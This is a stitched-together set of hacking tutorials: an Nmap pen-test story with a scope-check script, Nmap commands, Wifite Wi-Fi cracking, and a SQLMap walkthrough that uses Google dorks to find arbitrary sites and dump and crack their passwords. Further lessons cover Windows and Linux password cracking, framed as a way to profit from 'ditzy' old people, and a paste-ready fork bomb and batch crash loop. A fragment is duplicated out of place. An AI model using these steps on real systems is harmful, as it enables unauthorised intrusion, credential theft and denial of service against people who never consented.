Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking, security, Unix, and phone systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department closed a pen-testing deal with the Avatar Online gaming company.

Avatar Online (AO) is a small company working to create the next generation of massive multi-player online role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities found.

The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what IP address ranges the target is using, what hosts are available, what services those hosts are offering, general network topology details, and what firewall/filtering policies are in effect.

Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. Being the careful type, Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to AO[1]. The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will not help if Felix accidentally compromises another company's server! The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster.

Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The command he uses and an excerpt of the results are shown in Example 1.1.

Example 1.1:
felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for gw.avataronline.com (6.209.24.1)
Nmap scan report for ns1.avataronline.com (6.209.24.2)
Nmap scan report for ns2.avataronline.com (6.209.24.3)
Nmap scan report for ftp.avataronline.com (6.209.24.4)
Nmap scan report for 6.209.24.5
Nmap scan report for 6.209.24.6
Nmap scan report for www.avataronline.com (6.209.24.7)
Nmap scan report for 6.209.24.8
...
Nmap scan report for cluster-c120.corp.avataronline.com (6.209.24.120)
Nmap scan report for cluster-c121.corp.avataronline.com (6.209.24.121)
Nmap scan report for cluster-c122.corp.avataronline.com (6.209.24.122)
...
Nmap scan report for 6.207.0.0
Nmap scan report for fw.corp.avataronline.com (6.207.0.1)
Nmap scan report for dev2.corp.avataronline.com (6.207.0.2)
Nmap scan report for 6.207.0.3
Nmap scan report for 6.207.0.4
...
Nmap scan report for dhcp-21.corp.avataronline.com (6.207.0.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.207.0.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.207.0.23)
...
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>

Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for.

He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network. He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command:

nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan-%D 6.209.24.0/24 6.207.0.0/22
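Felix's reason for running the list scan first is scope verification: every address must belong to the client before anything more intrusive touches it. The following script is an added example (not from the Nmap book or the course) that automates that check over the `-sL` output format shown in Example 1.1. It parses each "Nmap scan report for" line, confirms the IP falls inside one of the authorized CIDR ranges, and confirms any reverse-DNS name sits under the client's domain. The sample input is constructed from the example above plus two invented lines (a foreign reverse-DNS name and an address outside the ranges) so the checks have something to flag.

```python
"""Scope check over Nmap list-scan (-sL) output (added example).

Every IP in the output must fall inside an authorized CIDR range and
every reverse-DNS name must sit under the client's domain; anything
else is reported before a more intrusive scan is run against it.
"""
import ipaddress
import re

# Ranges the client authorized in writing (taken from the story above).
AUTHORIZED = [ipaddress.ip_network("6.209.24.0/24"),
              ipaddress.ip_network("6.207.0.0/22")]
CLIENT_DOMAIN = "avataronline.com"

# Matches both "Nmap scan report for name (ip)" and "Nmap scan report for ip".
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>[\w.-]+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))$"
)


def parse_list_scan(text):
    """Yield (hostname_or_None, ip_address) for each scan-report line."""
    for line in text.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m:
            continue  # banner, "Nmap done", "..." elision lines
        yield m.group("name"), ipaddress.ip_address(m.group("ip1") or m.group("ip2"))


def check_scope(text, authorized=AUTHORIZED, domain=CLIENT_DOMAIN):
    """Return a list of (ip, reason) findings; an empty list means all in scope."""
    findings = []
    for name, ip in parse_list_scan(text):
        if not any(ip in net for net in authorized):
            findings.append((str(ip), "ip outside authorized ranges"))
        elif name and not (name == domain or name.endswith("." + domain)):
            findings.append((str(ip), f"reverse DNS {name} not under {domain}"))
    return findings


# Constructed sample: an excerpt of Example 1.1 plus two invented lines
# (a foreign reverse-DNS name and an out-of-range address) to exercise the checks.
SAMPLE = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for gw.avataronline.com (6.209.24.1)
Nmap scan report for ns1.avataronline.com (6.209.24.2)
Nmap scan report for www.avataronline.com (6.209.24.7)
Nmap scan report for cluster-c120.corp.avataronline.com (6.209.24.120)
Nmap scan report for fw.corp.avataronline.com (6.207.0.1)
Nmap scan report for dhcp-21.corp.avataronline.com (6.207.0.21)
Nmap scan report for mail.example-other-company.test (6.207.2.9)
Nmap scan report for 6.210.0.5
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
"""

if __name__ == "__main__":
    for ip, reason in check_scope(SAMPLE):
        print(f"OUT OF SCOPE: {ip}: {reason}")
```

Run it on a saved `nmap -sL ... > listscan.txt` and treat any finding as a stop condition: a foreign reverse-DNS name inside an authorized block usually means shared or reassigned address space that needs a conversation with the client before the port scan goes ahead.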
Nmap command reference

Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

1. How to open nmap
A. GUI method: Application → Kali Linux → Information gathering → DNS Analysis → nmap
B. Open a terminal, type nmap, hit enter

2. Scan a single IP address (when the firewall is OFF/ON on the target PC)
Syntax – nmap IP address/hostname
EX – nmap 192.168.75.131
Ex – nmap google.com

3. Boost up your nmap scan – using this command you can decrease scan time
Syntax – nmap –F IP address
Ex – nmap –F google.com

4. Scan multiple IP addresses or a subnet
A. Scan a range of IP addresses. Syntax – nmap IP address range. EX – nmap 192.168.75.1-131
B. Scan a range of IP addresses using a wildcard. Ex – nmap 192.168.75.*
C. Scan an entire subnet. Ex – nmap 192.168.75.1/24

5. Host Discovery or Ping Scan – scan a network and find out which servers and devices are up and running
Ex – nmap –sP 192.168.75.0/24

6. Turn on OS and version detection
Ex – nmap –O 192.168.75.131

7. Detect remote services (server / daemon) version numbers
Ex – nmap –sV 192.168.75.131

8. Scan a host when protected by the firewall
Ex – nmap –PN 192.168.75.1

9. Scan a firewall for security weakness
A. Null scan – TCP Null scan to fool a firewall into generating a response. Ex – nmap –sN 192.168.75.131
B. Fin scan – TCP Fin scan to check a firewall. Ex – nmap –sF 192.168.75.131
C. Xmas scan – TCP Xmas scan to check a firewall. Ex – nmap –sX 192.168.75.131

10. Find out the most commonly used TCP ports
A. TCP SYN scan (stealthy scan). Ex – nmap –sS 192.168.75.131
B. TCP connect scan. Ex – nmap –sT 192.168.75.131
C. TCP ACK scan. Ex – nmap –sA 192.168.75.131
D. TCP Window scan. Ex – nmap –sW 192.168.75.131
E. TCP Maimon scan. Ex – nmap –sM 192.168.75.131

11. Scan all TCP ports on the target IP
Ex – nmap –sT 192.168.75.131

12. UDP scan – scan a host for UDP services. This scan is used to view open UDP ports.
Ex – nmap –sU 192.168.75.131

13. Scan for IP protocol – this type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.
Ex – nmap –sO 192.168.75.131

14. List scan – this command is used to list the targets to scan
Ex – nmap –sL 192.168.75.131

Lesson 6: Wifi Hacking the easy way: Using WIFITE

Wifite
While the aircrack-ng suite is a well known name in wireless hacking, the same can't be said about Wifite. Living in the shade of the greatness of the established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand the simple English instructions given by Wifite can use it on his own).
Features Of Wifite
- Sorts targets by signal strength (in dB); cracks closest access points first
- Automatically de-authenticates clients of hidden networks to reveal SSIDs
- Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- Customizable settings (timeouts, packets/sec, etc)
- "Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
- All captured WPA handshakes are backed up to wifite.py's current directory
- Smart WPA de-authentication; cycles between all clients and broadcast deauths
- Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
- Displays session summary at exit; shows any cracked keys
- All passwords saved to cracked.txt
- Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here, that not only does it hack wifi the easy way, it also hacks in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets.

Hacking WEP network
wifite -wep
You might even have used the command
wifite
The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can expect it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag.) Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following:
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks:

WEP
-wep          only target WEP networks [off]
-pps <num>    set the number of packets per second to inject [600]
-wept <sec>   sec to wait for each attack, 0 implies endless [600]
-chopchop     use chopchop attack [on]
-arpreplay    use arpreplay attack [on]
-fragment     use fragmentation attack [on]
-caffelatte   use caffe-latte attack [on]
-p0841        use -p0841 attack [on]
-hirte        use hirte (cfrag) attack [on]
-nofakeauth   stop attack if fake authentication fails [off]
-wepca <n>    start cracking when number of ivs surpass n [10000]
-wepsave      save a copy of .cap files to this directory [off]

Troubleshooting
Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."
You are using Kali inside a virtual machine most probably. A virtual machine does not support the internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than a virtual machine in general.

Lesson 7: Sql Injection using SQLMap

Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions.

Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies' servers. It is one of the most common ways sites are hacked.

What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
- Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]

Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
You can google a list of google dork strings.

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every google dork string, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark). So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page. See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server
Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack.’. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack.’.

MySQL Errors
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that vulnerable database (this is also called enumerating the number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command on your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases
This command reveals quite a few interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database got and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
and of course we want to check what's inside the user_info table using SQLMAP SQL Injection as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on target table user_info of the sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of the sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target table user_login and user_password.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password for this user.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to how to use the SQLMAP SQL Injection tool. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
But hang on, this password looks funny. This can’t be someone’s password. Someone who leaves their website vulnerable like that just can’t have a password like that. That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

Step 7: Cracking password
So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?

Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash this is. In the command line type in the following command and on the prompt paste the hash value:
hash-identifier
Excellent. So this is a DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that (not in its help menu):
cudahashcat --help | grep DES
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500. I am running a Computer that's got an NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics card, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persistent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in a DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: Usual Hashcat was unable to determine the code for the DES hash. However both cudaHashcat and oclHashcat found and cracked the key. Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user. Next shows just that.

to citizens and old people who are just ditzy.
Lesson 8: Cracking Windows Passwords in Kali Linux

This is probably your number one money maker: pawn shops whose computers were forfeited and need to be sold, to citizens and old people who are just ditzy.

Windows uses NTLM hashes to protect the password database, which is stored in the SAM file. We simply need to target this file to retrieve the password. Almost all versions of Windows save passwords in the SAM file, which is usually located under /Windows/System32/config.

Crack and reset the system password locally using Kali

Insert the USB live CD and boot your PC. Make sure "Boot from USB" is the first option in the boot menu of the BIOS. On the Kali Linux boot menu, select Live (forensic mode). Kali Linux initialises and, when it has loaded, open a terminal window and navigate to the Windows password database file.

Crack the Windows password with ophcrack

After loading the live Kali Linux, go to the system menu > ophcrack and click OK. Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password cracker based on rainbow tables, and a very efficient implementation of rainbow tables done by the inventors of the method. With the free tables available you will not be able to crack every password; the paid tables range from $100 to $1000.

Once you have downloaded the tables you will need to unzip them into separate folders. I made a folder called "hash-tables" and then made 2 more folders within it, one for each table to unzip into. I downloaded the XP free small and the Vista free tables. Run the program and click on the "Tables" button. Select the table you downloaded and click "Install". Here, navigate to the folder where you unzipped the table, select it and then click "OK". You should see green lights next to the tables you installed.

Now you can see the ophcrack application window. Click on Load > Encrypted SAM. After that we need to give the path to the SAM directory, which is by default /mnt/hda1/WINDOWS/System32; click Choose. Here we can see the saved hashes, together with the username and user ID. Now click on the Crack button and wait for the password. If you have a complex password it will take a lot longer than a simple password, and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text; write it down and reboot the machine to log in. Enjoy. It's quick and easy. If your password isn't cracked, you can also log in as one of the other users with admin rights and then change your password from within Windows. That's it.

Reset the Windows password with chntpw

If you are unsuccessful with the free tables, navigate to the Windows password database file. The SAM database is usually in /media/name_of_hard_drive/Windows/System32/config; on your system it may look something like this: /media/hda1/Windows/System32/config. Type the command chntpw -l SAM and it will list all the usernames that are contained on the Windows system:

#chntpw -l SAM

The command gives us a list of usernames on the system. When we have the username we want to modify, we simply run the command chntpw -u "username" SAM. In the example below we typed chntpw -u "Sanjai sathish" SAM and got the following menu:

#chntpw -u "Sanjai sathish" SAM

We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7; it may work on an XP system, so it is recommended to clear the password. You will then be able to log in with a blank password. You can also promote the user to local administrator.

Crack the password in Linux using John the Ripper

John the Ripper is a fast password cracker. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, Windows LM hashes are supported out of the box, plus lots of other hashes and ciphers in the community-enhanced version. John the Ripper is a popular dictionary-based password cracking tool: it uses a wordlist full of passwords and then tries to crack a given password hash using each password from the wordlist. In other words it's called brute-force password cracking and is the most basic form of password cracking. It is also the most time- and CPU-consuming technique: the more passwords to try, the more time required. But still, if you want to crack a password locally on your system, then john is one of the good tools to try. John is in the top 10 security tools in Kali Linux.

In this topic I am going to show you how to use the unshadow command along with john to crack the passwords of users on a Linux system. On Linux the username/password details are stored in the following 2 files:

/etc/passwd
/etc/shadow

The actual password hash is stored in /etc/shadow and this file is accessible only with root access to the machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I will create a new user on my Linux system named happy, with password chess. Now that our new user is created, it's time to crack his password.

unshadow

The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create one file with username and password details. Usage is quite simple:

#unshadow /etc/passwd /etc/shadow > ~/crack

We redirected the output of the unshadow command to a new file called crack. Now this new file shall be cracked by john.
For the wordlist we shall be using the password list that comes with john on Kali Linux. It is located at /usr/share/john/password.lst, or you can use your own password lists too.

#john --wordlist=/usr/share/john/password.lst ~/crack

So in the above command john was able to crack the hash and get us the password "chess" for the user "happy". Now, john was able to crack it only because the password "chess" was present in the password list. If it were not there then john would have failed. Use the "--show" option to display all of the cracked passwords reliably:

#john --show ~/crack

Denial Of Service

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It can, however, be understood if explained properly. In this tutorial I'll try to give you a big picture of denial of service attacks.

What effect does a denial of service attack have?

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource of the right to use it. I mean, if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance; a name worth mentioning here is Anonymous) do a Distributed Denial of Service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hacktivists had to suffer jail time for participating in DDOS). So basically it's just what its name suggests: denial of service. Most of us use words like "This website was down the other day" without any idea what it actually means. Well, now you do.

Basic concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. We'll start at the easiest point, before I start using geeky terms like packets and all that. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario one: multiplayer online game

Now consider you are playing an online multiplayer game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that you have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago: they made a swastika and blocked access to the pool. This is the kind of thing that gives you a very basic idea of what a denial of service attack can be.

Scenario two: bus stop

Now assume that, for some reason, you want to disrupt the bus service of your city and stop people from using the service. To stop the legitimate people from utilising this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible, since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another. So while this may seem impossible in the real world, in the virtual world you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose; however, you are not recommended to use them, as a DOS on someone else is illegal and easy to detect (knock, knock; it's the police). We will, however, come back to this later and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Actually it takes more than just one packet; you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So companies buy servers that can provide enough data transfer for their regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it is under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS.

Now with modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time; the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server, and most probably it will not recover from the shock. It's just like you go to a page and start refreshing it very fast, maybe a thousand times every second. And you are not the only one; there are a thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Game over.

But it's not just the websites that get better. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. And the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides (the good, the bad and the ugly).

A live DOS on your Kali machine

We are going to execute a command in the Kali Linux terminal that will cripple the operating system and make it hang. Warning: this code will freeze Kali Linux. You'll lose any unsaved data. You will have to restart the machine the hard way (turn off the virtual machine directly, or cut the power supply if it's a real machine). Just copy and paste the code and your computer is gone:

:(){ :|:& };:

The machine froze right after I pressed Enter. I had to power it off from the VMware interface. What basically happened is that the one-line command asked the operating system to keep opening processes very fast for an infinite period of time. All the processing power is used by a useless command, while you, the legitimate user, can't do anything. So again: denial of service.

Here's something for the Windows users

Crashing Windows using a batch file: open Notepad and put the following code in it:

:1
Start
goto 1

Save the file as name.bat (bat here is the batch file extension) and run it. It basically executes the second line, and the third line makes it go over to the first. So again, execute the second, and then over to the first again, execute the second, infinitely.
